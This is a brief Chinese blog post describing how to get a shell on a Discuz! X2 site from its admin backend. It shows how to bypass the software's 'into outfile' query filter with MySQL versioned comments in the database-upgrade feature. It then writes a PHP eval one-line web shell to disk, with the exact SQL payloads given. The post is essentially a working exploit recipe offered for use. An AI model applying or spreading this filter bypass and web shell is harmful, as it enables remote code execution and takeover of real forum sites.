Discuz X2 后台getshell 鸡肋

最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell 百度无果,自己本地架设了一下 1,当mysql是root时 站长---数据库---升级 尝试 select '1' into outfile 'E:\2.txt' 会提示 [Type] 查询语句安全威胁 [Query] select '1' into outfile 'E:\2.txt' 为什么会这样呢? \config\config_global.php中 限制了into outfile函数 尝试绕过 /*!select*/ '1' /*!into outfile*/ 'E:\3.txt' Discuz! 数据结构升级成功,影响的记录行数 1 如果要导出一句话,即 /*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php' 注意:一句话密码不要有引号

发表评论